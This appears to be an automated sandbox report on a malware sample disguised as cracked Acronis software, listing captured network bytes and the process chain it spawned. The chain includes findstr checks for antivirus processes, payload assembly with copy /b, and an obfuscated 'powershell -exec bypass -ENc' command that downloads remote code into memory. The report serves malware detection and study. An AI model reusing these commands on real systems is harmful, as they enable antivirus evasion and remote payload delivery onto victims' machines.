                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: 33 c9 89 4d fc 89 55 f8 8b d8 33 c0 55 68 3d 4b 42 00 64 ff 30 64 89 20 8d 45 fc e8 99 95 fe ff 8b c8 8b 55 f8 8b c3 e8 05 ff ff ff 8b d8 33 c0 5a 59 59 64 89 10 68 44 4b 42 00 8d 45 fc e8 76 95 fe ff 58 ff e0 e9 12 45 fe ff eb ee 8b c3 5b 59 59 5d c3 90 55 8b ec 83 c4 f4 53 8b d8 52 e8 99 c3 fe ff 89 45 f4 33 c0 55 68 c2 4b 42 00 64 ff 30 64 89 20 d9 7d fe 33 c0 55 68 a2 4b 42 00 64 ff 30 64 89 20 8b c3 e8 10 59 fe ff 50 e8 0a c3 fe ff 89 45 f8 33 c0 5a 59 59 64 89 10 68 a9 4b 42 00 db e2 d9 6d fe 58 ff e0 e9 ad 44 fe ff eb f1 33 c0 5a 59 59 64 89 10 68 c9 4b 42 00 8b 45 f4 50 e8 35 c3 fe ff 58 ff e0 e9 8d 44 fe ff eb ed 8b 45 f8 5b 8b e5 5d c3 8d 40 00 55 8b ec 53 8b 5d 10 53 8b 5d 0c 53 0f b6 5d 08 53 8b 1d b4 06 4b 00 53 e8 5f 01 00 00 5b 5d c2 0c 00
                                                                                                                                                                                                                                            Data Ascii: 3MU3Uh=KBd0d EU3ZYYdhDKBEvXE[YY]USRE3UhKBd0d }3UhKBd0d YPE3ZYYdhKBmXD3ZYYdhKBEP5XDE[]@US]S]S]SKS_[]


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:04:35:06
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:829'879'991 bytes
                                                                                                                                                                                                                                            MD5 hash:2C83FB776A9E238D88E32393F17AE06A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:04:35:06
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:04:35:06
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                            Start time:04:35:08
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0xd0000
                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:04:35:08
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:04:35:08
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0xd0000
                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                            Start time:04:35:08
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c md 650429
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr /V "GERMANY" False
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:Palestine.com D
                                                                                                                                                                                                                                            Imagebase:0xaf0000
                                                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                            Start time:04:35:25
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                            Imagebase:0x7ff6822e0000
                                                                                                                                                                                                                                            File size:71'680 bytes
                                                                                                                                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                            Start time:04:35:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:829'879'991 bytes
                                                                                                                                                                                                                                            MD5 hash:2C83FB776A9E238D88E32393F17AE06A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:04:35:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:04:35:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0xd0000
                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0xd0000
                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c md 650429
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:Palestine.com D
                                                                                                                                                                                                                                            Imagebase:0xaf0000
                                                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:04:35:50
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABNAEUATQBvAFIAeQAnACsAJwBTAFQAcgBFAEEAbQAgAC0AVgBhAGwAdQBlACAAKAAmACgANgBTAHYAewAyAH0AewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAZQBjACcAKwAnAHQAbABUAFYALABsAFQAVgBPAGIAagBsAFQAVgAsAGwAVABWAE4AZQB3AC0AbABUAFYAKQAgACgANgBTAHYAewAyAH0AewAzAH0AewAxAH0AJwArACcAewAwAH0ANgBTAHYALQBmACAAbABUAFYAJwArACcAYQBtAGwAVABWACwAbABUAFYAUwB0AHIAZQBsAFQAVgAsAGwAVABWAFMAeQBzAGwAVABWACwAbABUAFYAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBsAFQAVgApACkACgAgACAAIAAgAEQAeQBFAHsATQBlAG0AQgBVAG0AbwByAHkAUwBUAHIAQgBVAG0AZQBhAG0AfQAuACgANgBTAHYAewAwAH0AewAxAH0ANgBTAHYAIAAtAGYAbABUAFYAVwBsAFQAVgAsAGwAJwArACcAVABWAHIAaQB0AGUAbABUAFYAKQAuAEkAbgB2AG8AJwArACcAawBlACgARAB5AEUAewBaAEkAQgBVAG0AcABEAGEAVABBAH0ALAAgADAALAAgAEQAeQBFAHsAWgBpAFAAQgBVAG0ARABCAFUAbQBBAHQAYQB9AC4ANgBTAHYAbABlAG4ARwBCAFUAbQBUAEgANgBTAHYAKQAKACAAIAAgACAARAB5AEUAewBtAEUAbQBPAFIAQgBVAG0AWQBCAFUAbQBTAHQAQgBVAG0AUgBFAEIAVQBtAEEATQB9AC4ANgBTAHYAcwBCACcAKwAnAFUAbQBFAGUAJwArACcAawA2AFMAdgAoADAALAAgACAAKABWAEEAUgBJAEEAQgBMAEUAIAAoADYAUwB2ADgAbQBBADYAUwB2ACsANgBTAHYARgBaADYAUwB2ACkAIAApAC4AdgBhAGwAVQBlADoAOgA2AFMAdgBiAEIAVQBtAGUARwBJAE4ANgBTAHYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFUATgBpAHEAdQBFAEYATwBMAGQARQBSAG4AQQBNAGUAIAAtAFYAYQBsAHUAZQAgACgARAB5AEUAOABhAHAAQwA6ADoAKAA2AFMAdgB7ADEAfQB7ADAAfQB7ADIAfQA2AFMAdgAnACsAJwAgAC0AZgBsAFQAVgB1AGwAVABWACwAbABUAFYATgBlAHcARwBsAFQAVgAsAGwAVABWAGkAZABsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApAC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAdgAtAGYAbABUAFYAVABsAFQAJwArACcAVgAsAGwAVABWAG8AbABUAFYALABsAFQAVgBTAHQAcgBpAG4AZwBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlA